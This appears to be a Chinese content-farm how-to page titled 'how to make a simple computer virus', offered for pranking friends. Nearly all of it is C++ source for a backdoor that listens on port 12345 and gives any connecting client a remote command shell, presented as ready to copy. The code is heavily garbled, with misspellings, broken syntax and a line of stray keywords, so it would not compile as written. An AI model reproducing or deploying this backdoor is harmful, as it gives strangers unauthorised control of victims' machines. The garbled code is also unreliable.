怎樣制作一個(gè)簡(jiǎn)單的電腦病毒
如何才能做出一個(gè)簡(jiǎn)單的電腦病毒呢!和朋友們開開小玩笑呢!下面由學(xué)習(xí)啦小編給你做出詳細(xì)的制作簡(jiǎn)單的電腦病毒介紹!希望對(duì)你有幫助!
制作簡(jiǎn)單的電腦病毒介紹:
這是個(gè)簡(jiǎn)單的后門(cmdshell)
#i nclude
int main(int argc,char*argv[])
{
return 0;
}//這個(gè)大家都知道了然后添加頭文件C m d S h e l l.h跟Socket.h
#i nclude//WINDOW程序基本上都要包含這個(gè)文件的了!!!/cy
#i nclude "Cmdshell.h"
#i nclude"SocketEX.h"
int main(int argz,char* argv[])
{
CSocketEX client,server;
//
server.Create(12345,NULL)//
//
server.Listen()://
while(1)//
#i nclude
{
server.Accept(client);//
SOCKET whi =client.Detach();
//
CreateThread(0,0.(L P T H R E A D _ S T A R T _R O U T I N E)Talk With(void*)whi,0,MULL)'
//
}
}
void TalkWithCliet(void cs*)
{
SOCKET wsc=(SOCKET)cs;//
c.Attach(wsc);//
char *cmd;//
c.Send("Welcome TO CmdShell\r\n"),strlen("Welcome TO CmdShell\r\n"));
//
while(1);//
{
c.Send("#",stelen("#"));
//
cmd=recvcmd(c);
//
/******得到cmd shell*************/
if (strcmp(cmd ,"shell")==0
{
CCmdShell cmdshell
//
cmdshell.LetUsGo(c.m_hSocket);
//
continue;
}
//
/**************斷開連接*************/
if (strcmp(cmd,"quit")==0)
{break;}
//
if(c.m.h_Socket==INVALD_SOCKET)
{break;}
//
if(wsc==INVALID_SOCKET)
{break}
} wsc jasd break void continue if wcs char while int email if !//sdh
return
//
closesocket(wsc);
}
char*recvcmd(CSocketEx&c)//
{
char*cmd;//
charbuf[32];//
char chr[1];//
int i=0;
ZeroMemory(but,32);//
while(i<32);//
{
if(!c.Receive(chr,1)c.Close();//
buf[i]=chr[0];//
if(chr[0]==oxa||chr[0]==oxa)//
{
buf[i]=0;
break;
}
i++;
}
cmd=but;//
return cmd;//
}
以上是c++代碼,復(fù)制即可,希望對(duì)你有幫助!
看了“怎樣制作一個(gè)簡(jiǎn)單的電腦病毒”文章的還看了:
1.如何制作電腦病毒